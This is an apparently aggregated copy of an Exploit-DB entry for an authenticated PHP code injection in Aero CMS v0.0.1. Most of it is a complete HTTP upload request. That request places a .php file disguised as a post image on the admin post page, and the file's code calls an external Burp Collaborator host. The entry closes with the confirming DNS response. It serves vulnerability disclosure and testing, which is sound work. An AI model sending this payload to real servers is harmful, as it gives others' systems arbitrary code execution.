4

[webapps] Aero CMS v0.0.1 - PHP Code Injection (auth)

 1 year ago
source link: https://www.exploit-db.com/exploits/51085
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Aero CMS v0.0.1 - PHP Code Injection (auth)

EDB-ID:

51085

EDB Verified:

Platform:

PHP

Date:

2023-03-27

Vulnerable App:

# Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS
# Software Link: https://github.com/MegaTKC/AeroCMS
# Version: 0.0.1
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example 
-----------------------------------------------------------------------------------------------------------------------
Param: image content uploading image
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------

POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116
Content-Length: 1156
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post
Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_title"

mmmmmmmmmmmmmmmmm
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_category_id"

1
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_user"

admin
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_status"

draft
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="image"; filename="at8vapghhb.php"
Content-Type: text/plain

<?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?>
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_tags"


-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_content"

<p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p>
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="create_post"

Publish Post
-----------------------------369779619541997471051134453116--

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK